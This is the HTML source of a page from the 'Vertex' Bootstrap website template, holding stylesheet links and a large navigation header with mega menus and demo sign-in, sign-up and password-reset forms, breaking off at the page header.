﻿<!DOCTYPE html>

<html>
<head>
    <meta charset="utf-8">
    <title>Vertex - Responsive HTML5 Bootstrap Template</title>
    <meta name="keywords" content="HTML5 Template" />
    <meta name="description" content="Vertex - Responsive HTML5 Template">
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <link rel="shortcut icon" type="image/png" href="img/favicon_2.png" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <!-- Web Fonts  -->
    <link href="../fonts.googleapis.com/css_2.css" rel="stylesheet">

    <!-- Libs CSS -->
    <link href="css/bootstrap.min_2.css" rel="stylesheet" />
    <link href="css/style_2.css" rel="stylesheet" />
    <link href="css/font-awesome.min_2.css" rel="stylesheet" />
    <link href="css/streamline-icon_2.css" rel="stylesheet" />
    <link href="css/header_2.css" rel="stylesheet" />
    <link href="css/portfolio_2.css" rel="stylesheet" />
    <link href="css/blog_2.css" rel="stylesheet" />
    <link href="css/v-animation_2.css" rel="stylesheet" />
    <link href="css/v-bg-stylish_2.css" rel="stylesheet" />
    <link href="css/font-icons_2.css" rel="stylesheet" />
    <link href="css/shortcodes_2.css" rel="stylesheet" />
    <link href="css/utilities_2.css" rel="stylesheet" />
    <link href="css/theme-responsive_2.css" rel="stylesheet" />
    <link href="plugins/aos/aos_2.css" rel="stylesheet" />
    <link href="plugins/owl-carousel/owl.theme_2.css" rel="stylesheet" />
    <link href="plugins/owl-carousel/owl.carousel_2.css" rel="stylesheet" />

    <!-- Skin -->
    <link rel="stylesheet" href="css/skin/default_2.css">

    <!-- Custom CSS -->
    <link rel="stylesheet" href="css/custom_2.css">
</head>

<body>

    <!--Header-->
    <header id="header" class="header-effect-reveal" data-plugin-options="{'stickyEnabled': true, 'stickyEnableOnBoxed': true, 'stickyEnableOnMobile': true, 'stickyStartAt': 70}">
        <div class="header-body">
            <div class="header-container container">
                <div class="header-row">
                    <div class="header-column justify-content-start">
                        <div class="header-logo">
                            <a href="index_2.html">
                                <img alt="Vertex" width="130" src="img/logo_2.png">
                            </a>
                        </div>
                    </div>
                    <div class="header-column justify-content-end">
                        <div class="header-nav header-nav-light-dropdown">
                            <div class="header-nav-main header-nav-main-effect-1 header-nav-main-sub-effect-1">
                                <nav class="collapse">
                                    <ul class="nav flex-column flex-lg-row" id="mainNav">
                                        <li class="dropdown dropdown-mega">
                                            <a class="dropdown-item dropdown-toggle active" href="page-full-width_2.html#">
                                                Home
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li>
                                                    <div class="dropdown-mega-content">
                                                        <div class="row">
                                                            <div class="col-lg-3 dropdown-mega-sub-content-block overlay overlay-show overlay-color-primary d-none d-lg-block">
                                                                <span class="top-sub-title text-color-light-2 d-block">THE MOST</span>
                                                                <span class="text-color-light font-weight-bold d-block text-4 mb-2">POWERFUL</span>
                                                                <p class="text-color-light-2">A revolutionary theme trusted by tons of customers</p>
                                                                <a class="btn btn-dark btn-rounded btn-v-3 btn-h-2 content-block-button font-weight-semibold" href="page-full-width_2.html#">GET STARTED</a>
                                                            </div>
                                                            <div class="col-lg-3 ml-auto">
                                                                <span class="dropdown-mega-sub-title">MULTI PURPOSE</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item current" href="index_2.html">Home - Variation 1</a></li>
                                                                    <li><a class="dropdown-item" href="index-2_2.html">Home - Variation 2</a></li>
                                                                    <li><a class="dropdown-item" href="index-3_2.html">Home - Variation 3</a></li>
                                                                    <li><a class="dropdown-item" href="index-4_2.html">Home - Variation 4</a></li>
                                                                    <li><a class="dropdown-item" href="index-5_2.html">Home - Variation 5</a></li>
                                                                    <li><a class="dropdown-item" href="index-6_2.html">Home - Variation 6</a></li>
                                                                    <li><a class="dropdown-item" href="index-7_2.html">Home - Variation 7</a></li>
                                                                    <li><a class="dropdown-item" href="index-8_2.html">Home - Variation 8</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">PORTFOLIO</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="index-9_2.html">Home - Variation 9 </a></li>
                                                                    <li><a class="dropdown-item" href="index-10_2.html">Home - Variation 10 <span class="badge badge-warning badge-sm ml-1">Gap Outside</span></a></li>
                                                                    <li><a class="dropdown-item" href="index-11_2.html">Home - Variation 11</a></li>
                                                                </ul>
                                                                <span class="dropdown-mega-sub-title">Contact Us</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="contact-us_2.html">Contact Us</a></li>
                                                                    <li><a class="dropdown-item" href="contact-us-2_2.html">Contact Us 2</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">About Us</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="page-about-us_2.html">About Us</a></li>
                                                                    <li><a class="dropdown-item" href="page-about-us-2_2.html">About Us 2</a></li>
                                                                    <li><a class="dropdown-item" href="page-about-us-3_2.html">About Us 3</a></li>
                                                                    <li><a class="dropdown-item" href="page-about-us-4_2.html">About Us 4</a></li>
                                                                </ul>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown dropdown-mega dropdown-mega-style-2">
                                            <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#">
                                                Elements
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li>
                                                    <div class="dropdown-mega-content container">
                                                        <div class="row">
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">ELEMENTS 1</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="element-content-carousel_2.html"><i class="icon-list-1 menu-icon"></i>Content Carousel</a></li>
                                                                    <li><a class="dropdown-item" href="element-common2_2.html#modal-windows"><i class="icon-outbox-2 menu-icon"></i>Modal Windows</a></li>
                                                                    <li><a class="dropdown-item" href="element-testimonials_2.html"><i class="icon-chat-2 menu-icon"></i>Testimonials</a></li>
                                                                    <li><a class="dropdown-item" href="element-brands-clients_2.html"><i class="icon-connection-2 menu-icon"></i>Brands & Clients</a></li>
                                                                    <li><a class="dropdown-item" href="element-common2_2.html#image-frames"><i class="icon-photo-frame menu-icon"></i>Image Frames</a></li>
                                                                    <li><a class="dropdown-item" href="element-buttons_2.html"><i class="icon-cursors menu-icon"></i>Buttons<span class="badge badge-warning badge-sm ml-1">Hot</span></a></li>
                                                                    <li><a class="dropdown-item" href="element-iconboxes_2.html"><i class="icon-star-1 menu-icon"></i>Animation & Feature Boxes</a></li>
                                                                    <li><a class="dropdown-item" href="element-common2_2.html#circle-counters"><i class="icon-heart-plus menu-icon"></i>Circle Counters</a></li>
                                                                    <li><a class="dropdown-item" href="page-about-us-2_2.html"><i class="icon-photo-frame menu-icon"></i>Fancy Heading</a></li>
                                                                    <li><a class="dropdown-item" href="element-common2_2.html#recent-posts"><i class="icon-rss-1 menu-icon"></i>Recent Posts & News</a></li>
                                                                    <li><a class="dropdown-item" href="element-icon-grid_2.html"><i class="icon-grid menu-icon"></i>Icon Grids</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">ELEMENTS 2</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="index-3_2.html"><i class="icon-video-camera-2 menu-icon"></i>Video Section</a></li>
                                                                    <li><a class="dropdown-item" href="element-social-icons_2.html"><i class="icon-link menu-icon"></i>Social Icons</a></li>
                                                                    <li><a class="dropdown-item" href="element-pricing-tables_2.html"><i class="icon-money menu-icon"></i>Pricing Tables</a></li>
                                                                    <li><a class="dropdown-item" href="element-charts_2.html"><i class="icon-business-chart-2 menu-icon"></i>Charts <span class="v-menu-item-info">Hot</span></a></li>
                                                                    <li><a class="dropdown-item" href="element-progress-bar_2.html"><i class="icon-type-2 menu-icon"></i>Progress Bars</a></li>
                                                                    <li><a class="dropdown-item" href="element-tabs_2.html"><i class="icon-window-selection-2 menu-icon"></i>Tab Control</a></li>
                                                                    <li><a class="dropdown-item" href="element-team-member_2.html"><i class="icon-user-star-1 menu-icon"></i>Team Elements</a></li>
                                                                    <li><a class="dropdown-item" href="element-accordion_2.html"><i class="icon-credit-card menu-icon"></i>Accordion & Toggles</a></li>
                                                                    <li><a class="dropdown-item" href="element-call-to-actions_2.html"><i class="icon-bookmark-3 menu-icon"></i>Call To Actions <span class="badge badge-warning badge-sm ml-1">Important</span></a></li>
                                                                    <li><a class="dropdown-item" href="element-process-steps_2.html"><i class="icon-shear-tool menu-icon"></i>Process Steps</a></li>
                                                                    <li><a class="dropdown-item" href="element-animated-headline_2.html"><i class="icon-cigarette menu-icon"></i>Animated Headline</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">ELEMENTS 3</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="element-common_2.html#gridsystem"><i class="icon-arrange-4-1 menu-icon"></i>Grid System</a></li>
                                                                    <li><a class="dropdown-item" href="element-common_2.html#typograpy"><i class="icon-small-caps menu-icon"></i>Typograpy</a></li>
                                                                    <li><a class="dropdown-item" href="element-forms_2.html"><i class="icon-text menu-icon"></i>Form Elements <span class="badge badge-danger badge-sm ml-1">Hot</span></a></li>
                                                                    <li><a class="dropdown-item" href="element-common_2.html#lists"><i class="icon-check-list menu-icon"></i>Lists</a></li>
                                                                    <li class="dropdown-submenu">
                                                                        <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#"><i class="icon-bucket menu-icon"></i> Icons</a>
                                                                        <ul class="dropdown-menu">
                                                                            <li><a class="dropdown-item" href="element-icons_2.html">Font Awesome Icons</a></li>
                                                                            <li><a class="dropdown-item" href="element-icons-2_2.html">Streamline Icons</a></li>
                                                                            <li><a class="dropdown-item" href="element-social-icons_2.html">Social Icons</a></li>
                                                                        </ul>
                                                                    </li>
                                                                    <li><a class="dropdown-item" href="element-common_2.html#info-messages"><i class="icon-information menu-icon"></i>Info Messages</a></li>
                                                                    <li><a class="dropdown-item" href="element-common_2.html#heading-options"><i class="icon-megaphone-1 menu-icon"></i>Heading Options</a></li>
                                                                    <li><a class="dropdown-item" href="element-common_2.html#tagline"><i class="icon-inbox-3 menu-icon"></i>Tagline & Info Boxes</a></li>
                                                                    <li><a class="dropdown-item" href="element-common_2.html#pagination"><i class="icon-scroll-horizontal-1 menu-icon"></i>Pagination</a></li>
                                                                    <li><a class="dropdown-item" href="element-common_2.html#separator-divider"><i class="icon-scissor-1 menu-icon"></i>Separator / Divider</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3 dropdown-mega-sub-content-block d-none d-lg-block">
                                                                <img src="img/logo-white_2.png" class="img-responsive content-block-image" alt="" width="110" />
                                                                <span class="top-sub-title text-color-light-2 d-block">THE MOST</span>
                                                                <span class="text-color-light font-weight-bold d-block text-4 mb-4">POWERFUL</span>
                                                                <p class="text-color-light-2">A revolutionary theme<br> trusted by tons of<br> customers</p>
                                                                <a class="btn d-inline-block content-block-button text-color-primary font-weight-bold p-0" href="page-full-width_2.html#">GET STARTED</a>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#">
                                                Features
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#"><i class="icon-check-list menu-icon"></i> Headers</a>
                                                    <ul class="dropdown-menu">
                                                        <li class="dropdown-submenu">
                                                            <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#">Top Bar</a>
                                                            <ul class="dropdown-menu">
                                                                <li><a class="dropdown-item" href="index-header-colored-top-bar_2.html">Default + Colored Top Bar</a></li>
                                                                <li><a class="dropdown-item" href="index-header-top-bar-search_2.html">Default + Top Bar with Search</a></li>
                                                                <li><a class="dropdown-item" href="index-header-top-bar-button_2.html">Default + Top Bar with Button</a></li>
                                                            </ul>
                                                        </li>
                                                        <li><a class="dropdown-item" href="index-header-center_2.html">Center</a></li>
                                                        <li><a class="dropdown-item" href="index-header-logo-between-menu_2.html">Logo Between Menu</a></li>
                                                        <li><a class="dropdown-item" href="index-header-below-slider_2.html">Below Slider</a></li>
                                                        <li><a class="dropdown-item" href="index-header-with-borders_2.html">With Borders</a></li>
                                                        <li><a class="dropdown-item" href="index-header-full-width_2.html">Full Width</a></li>
                                                        <li><a class="dropdown-item" href="index-6_2.html">Floating</a></li>
                                                        <li class="dropdown-submenu">
                                                            <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#">Transparent</a>
                                                            <ul class="dropdown-menu">
                                                                <li><a class="dropdown-item" href="portfolio-single_2.html">Transparent</a></li>
                                                                <li><a class="dropdown-item" href="index-8_2.html">Transparent - Bottom Border</a></li>
                                                                <li><a class="dropdown-item" href="index-header-semi-transparent_2.html">Semi Transparent</a></li>
                                                                <li><a class="dropdown-item" href="index-11_2.html">Semi Transparent - Light</a></li>
                                                            </ul>
                                                        </li>
                                                        <li class="dropdown-submenu">
                                                            <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#">Navbar</a>
                                                            <ul class="dropdown-menu">
                                                                <li><a class="dropdown-item" href="index-header-navbar_2.html">Navbar</a></li>
                                                                <li><a class="dropdown-item" href="index-header-navbar-centered-logo_2.html">Navbar - Centered Logo</a></li>
                                                            </ul>
                                                        </li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#"><i class="icon-window-2 menu-icon"></i> Navigations</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="index-navigation-top-line_2.html">Top Line</a></li>
                                                        <li><a class="dropdown-item" href="index-navigation-stripe_2.html">Stripe</a></li>
                                                        <li><a class="dropdown-item" href="index-navigation-dark-dropdown_2.html">Dark Dropdown</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#"><i class="icon-layers menu-icon"></i> Footers</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-404_2.html#footer">Footer Variation</a></li>
                                                        <li><a class="dropdown-item" href="page-faq_2.html#footer">Footer Variation 2</a></li>
                                                        <li><a class="dropdown-item" href="page-services_2.html#footer">Footer Variation 3</a></li>
                                                        <li><a class="dropdown-item" href="index-11_2.html#footer">Footer Variation 4</a></li>
                                                        <li><a class="dropdown-item" href="feature-footers_2.html">Footer Variation 5</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#"><i class="icon-arrange-3-5 menu-icon"></i> Page Headers</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="index-page-header-left-alignment_2.html">Left Alignment</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-center-alignment_2.html">Center Alignment</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-right-alignment_2.html">Right Alignment</a></li>
                                                        <li class="dropdown-submenu">
                                                            <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#">Colors</a>
                                                            <ul class="dropdown-menu">
                                                                <li><a class="dropdown-item" href="index-page-header-color-primary_2.html">Primary Color</a></li>
                                                                <li><a class="dropdown-item" href="index-page-header-color-secondary_2.html">Secondary Color</a></li>
                                                                <li><a class="dropdown-item" href="index-page-header-color-tertiary_2.html">Tertiary Color</a></li>
                                                                <li><a class="dropdown-item" href="index-page-header-color-quaternary_2.html">Quaternary Color</a></li>
                                                            </ul>
                                                        </li>
                                                        <li><a class="dropdown-item" href="index-page-header-dark_2.html">Dark</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-parallax_2.html">Parallax</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-video-background_2.html">Video Background</a></li>
                                                        <li><a class="dropdown-item" href="index-page-header-mini_2.html">Mini</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#"><i class="icon-board menu-icon"></i> Layout Options</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="index-10-boxed_2.html">Boxed</a></li>
                                                        <li><a class="dropdown-item" href="index-10_2.html">Gap Outside</a></li>
                                                    </ul>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#">
                                                Pages
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#">About Us</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-about-us_2.html">About Us</a></li>
                                                        <li><a class="dropdown-item" href="page-about-us-2_2.html">About Us 2</a></li>
                                                        <li><a class="dropdown-item" href="page-about-us-3_2.html">About Us 3</a></li>
                                                        <li><a class="dropdown-item" href="page-about-us-4_2.html">About Us 4</a></li>
                                                        <li><a class="dropdown-item" href="page-about-me_2.html">About Me</a></li>
                                                        <li><a class="dropdown-item" href="page-about-me-2_2.html">About Me 2</a></li>
                                                        <li><a class="dropdown-item" href="page-about-me-3_2.html">About Me 3</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#">Contact Us</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="contact-us_2.html">Contact Us</a></li>
                                                        <li><a class="dropdown-item" href="contact-us-2_2.html">Contact Us 2</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#">Layouts</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-right-sidebar_2.html">Right Sidebar Page</a></li>
                                                        <li><a class="dropdown-item" href="page-left-sidebar_2.html">Left Sidebar Page</a></li>
                                                        <li><a class="dropdown-item" href="page-left-right-sidebar_2.html">Left & Right Sidebar Page</a></li>
                                                        <li><a class="dropdown-item" href="page-full-width_2.html">Full width Page</a></li>
                                                    </ul>
                                                </li>
                                                <li><a class="dropdown-item" href="page-meet-team_2.html">Team</a></li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#">Services</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-services_2.html">Services</a></li>
                                                        <li><a class="dropdown-item" href="page-services-2_2.html">Services 2</a></li>
                                                    </ul>
                                                </li>
                                                <li><a class="dropdown-item" href="page-careers_2.html">Careers</a></li>
                                                <li><a class="dropdown-item" href="page-job_2.html">Job Page</a></li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#">Login / Register</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-login_2.html">Login</a></li>
                                                        <li><a class="dropdown-item" href="page-login-2_2.html">Login 2</a></li>
                                                        <li><a class="dropdown-item" href="page-register_2.html">Register</a></li>
                                                    </ul>
                                                </li>
                                                <li><a class="dropdown-item" href="page-search-result_2.html">Search Result</a></li>
                                                <li><a class="dropdown-item" href="page-help_2.html">Help Page</a></li>
                                                <li><a class="dropdown-item" href="page-author-page_2.html">Author Page</a></li>
                                                <li><a class="dropdown-item" href="page-pricing_2.html">Pricing Page</a></li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#">Extra</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="page-faq_2.html">FAQ</a></li>
                                                        <li><a class="dropdown-item" href="page-404_2.html">404 Error</a></li>
                                                        <li><a class="dropdown-item" href="page-privacy_2.html">Privacy Page</a></li>
                                                    </ul>
                                                </li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#">Support</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="changelog_2.html"><i class="fa fa-terminal"></i>Changelog</a></li>
                                                        <li><a class="dropdown-item" href="theme-plugins_2.html"><i class="fa fa-star-o"></i>Theme Plugins</a></li>
                                                    </ul>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown dropdown-mega dropdown-mega-style-2">
                                            <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#">
                                                Portfolio
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li>
                                                    <div class="dropdown-mega-content container">
                                                        <div class="row">
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">Portfolio Gallery</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-two-gallery_2.html">Gallery - 2 Columns</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-three-gallery_2.html">Gallery - 3 Columns</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-four-gallery_2.html">Gallery - 4 Columns</a></li>
                                                                </ul>
                                                                <span class="dropdown-mega-sub-title">Portfolio Variations</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-right-sidebar_2.html">Right Sidebar</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-left-sidebar_2.html">Left Sidebar</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">Portfolio Standard</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-two-standard_2.html">Standard - 2 Columns</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-three-standard_2.html">Standard - 3 Columns</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-four-standard_2.html">Standard - 4 Columns</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">Portfolio Masonry</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-masonry-gallery_2.html">Gallery</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-masonry-standard_2.html">Standard</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-masonry-fw_2.html">Fullwidth Standard</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-masonry-fw-2_2.html">Fullwidth Gallery</a></li>
                                                                </ul>
                                                            </div>
                                                            <div class="col-lg-3">
                                                                <span class="dropdown-mega-sub-title">Portfolio Single</span>
                                                                <ul class="dropdown-mega-sub-nav">
                                                                    <li><a class="dropdown-item" href="portfolio-single_2.html">Single</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-slider_2.html">Slider</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-2_2.html">Custom</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-gallery_2.html">Gallery</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-fw_2.html">Full Width</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-fw-slides_2.html">Full Width Slides</a></li>
                                                                    <li><a class="dropdown-item" href="portfolio-single-extended_2.html">Extended <span class="badge badge-warning badge-sm ml-1">Showcase</span> </a></li>
                                                                </ul>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </li>
                                            </ul>
                                        </li>
                                        <li class="dropdown">
                                            <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#">
                                                Blog
                                            </a>
                                            <ul class="dropdown-menu">
                                                <li><div class="menu-sm-info">Perfect Design</div></li>
                                                <li><a class="dropdown-item" href="blog-standard-sidebar_2.html"><i class="icon-list-1 menu-icon"></i> Blog Standard</a></li>
                                                <li><a class="dropdown-item" href="blog-mini-sidebar_2.html"><i class="icon-list-2 menu-icon"></i> Blog Small</a></li>
                                                <li><a class="dropdown-item" href="blog-masonry_2.html"><i class="icon-arrange-4-1 menu-icon"></i> Blog Masonry</a></li>
                                                <li><a class="dropdown-item" href="blog-masonry-fw_2.html"><i class="icon-arrange-5 menu-icon"></i> Blog Fullwidth Masonry</a></li>
                                                <li class="dropdown-submenu">
                                                    <a class="dropdown-item dropdown-toggle" href="page-full-width_2.html#"><i class="icon-link menu-icon"></i>  Blog Posts</a>
                                                    <ul class="dropdown-menu">
                                                        <li><a class="dropdown-item" href="blog-standard-post_2.html">Standard Post</a></li>
                                                        <li><a class="dropdown-item" href="blog-full-width-post_2.html">Full Width Post</a></li>
                                                        <li><a class="dropdown-item" href="blog-standard-post-2_2.html">Standard Post - Modern</a></li>
                                                        <li><a class="dropdown-item" href="blog-full-width-post-2_2.html">Full Width Post - Modern</a></li>
                                                    </ul>
                                                </li>
                                            </ul>
                                        </li>

                                        <li class="dropdown dropdown-mega dropdown-mega-signin signin ml-lg-3" id="headerAccount">
                                            <a class="dropdown-item pl-lg-4" href="page-login_2.html">Sign In</a>
                                            <ul class="dropdown-menu">
                                                <li>
                                                    <div class="dropdown-mega-content">
                                                        <div class="row">
                                                            <div class="col">
                                                                <div class="signin-form">
                                                                    <span class="top-sub-title text-color-light-3">MEMBERSHIP</span>
                                                                    <h2 class="text-4 mb-4 mt-1">Sign In</h2>
                                                                    <form action="page-login_2.html" id="frmSignIn" method="post">
                                                                        <div class="form-row">
                                                                            <div class="form-group col mb-2">
                                                                                <input type="email" value="" maxlength="100" class="form-control" name="email" id="signInEmail" placeholder="Username" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="form-row">
                                                                            <div class="form-group col">
                                                                                <input type="password" value="" class="form-control" name="password" id="signInPassword" placeholder="Password" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="form-row">
                                                                            <div class="form-group col">
                                                                                <div class="form-check checkbox-custom checkbox-default">
                                                                                    <input class="form-check-input" type="checkbox" id="signInRemember">
                                                                                    <label class="form-check-label" for="signInRemember">
                                                                                        Remember me
                                                                                    </label>
                                                                                </div>
                                                                            </div>
                                                                            <div class="form-group col text-right">
                                                                                <a href="page-full-width_2.html#" id="headerRecover" class="forgot-pw text-color-dark d-block">Forgot password?</a>
                                                                            </div>
                                                                        </div>
                                                                        <div class="row align-items-center">
                                                                            <div class="col">
                                                                                <a href="page-full-width_2.html#" id="headerSignUp" class="text-color-primary pl-0">Sign Up Now!</a>
                                                                            </div>
                                                                            <div class="col text-right">
                                                                                <button type="submit" class="btn btn-primary btn-sm pull-right mb-0 mr-0"><i class="fa fa-lock"></i> SIGN IN</button>
                                                                            </div>
                                                                        </div>
                                                                    </form>
                                                                </div>
                                                                <div class="signup-form">
                                                                    <span class="top-sub-title text-color-light-3">MEMBERSHIP</span>
                                                                    <h2 class="text-4 mb-4 mt-1">Sign Up</h2>
                                                                    <form action="page-full-width_2.html#" id="frmSignUp" method="post">
                                                                        <div class="form-row">
                                                                            <div class="form-group col mb-2">
                                                                                <input type="text" value="" class="form-control" name="name" id="signUpName" placeholder="Full Name" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="form-row">
                                                                            <div class="form-group col mb-2">
                                                                                <input type="email" value="" maxlength="100" class="form-control" name="email" id="signUpEmail" placeholder="E-mail" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="form-row mb-3">
                                                                            <div class="form-group col">
                                                                                <input type="password" value="" class="form-control" name="password" id="signUpPassword" placeholder="Password" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="row align-items-center">
                                                                            <div class="col">
                                                                                <a href="page-full-width_2.html#" id="headerSignIn" class="text-color-primary pl-0">Have an account?</a>
                                                                            </div>
                                                                            <div class="col text-right">
                                                                                <button type="submit" class="btn btn-primary btn-sm pull-right mb-0 mr-0">SIGN UP</button>
                                                                            </div>
                                                                        </div>
                                                                    </form>
                                                                </div>
                                                                <div class="recover-form">
                                                                    <span class="top-sub-title text-color-light-3">MEMBERSHIP</span>
                                                                    <h2 class="text-4 mb-4 mt-1">Reset my Password</h2>
                                                                    <form action="page-full-width_2.html#" id="frmResetPassword" method="post">
                                                                        <div class="form-row mb-4">
                                                                            <div class="form-group col mb-2">
                                                                                <input type="email" value="" maxlength="100" class="form-control" name="email" id="resetPasswordEmail" placeholder="E-mail" required>
                                                                            </div>
                                                                        </div>
                                                                        <div class="row align-items-center">
                                                                            <div class="col">
                                                                                <a href="page-full-width_2.html#" id="headerRecoverCancel" class="text-color-primary pl-0">Have an account?</a>
                                                                            </div>
                                                                            <div class="col text-right">
                                                                                <button type="submit" class="btn btn-primary btn-sm pull-right mb-0 mr-0">SUBMIT</button>
                                                                            </div>
                                                                        </div>
                                                                    </form>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </li>
                                            </ul>
                                        </li>
                                    </ul>
                                </nav>
                            </div>
                            <div class="header-button d-none d-sm-flex ml-3">
                                <a class="btn v-btn standard lightgrey sf-icon-reveal mb-0 mr-0" href="https://wrapbootstrap.com/theme/express-business-website-template-WB0TR1711" target="_self">
                                    <i class="icon-cart-4"></i><span class="text text-uppercase">Buy Me</span>
                                </a>
                            </div>
                            <button class="header-btn-collapse-nav ml-3" data-toggle="collapse" data-target=".header-nav-main nav">
                                <span class="hamburguer">
                                    <span></span>
                                    <span></span>
                                    <span></span>
                                </span>
                                <span class="close">
                                    <span></span>
                                    <span></span>
                                </span>
                            </button>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </header>
    <!--End Header-->

    <div role="main" class="main">

        <section class="page-header">
            <div class="container">
                <div class="row align-items-center">
                    <div class="col-md-8 text-left">
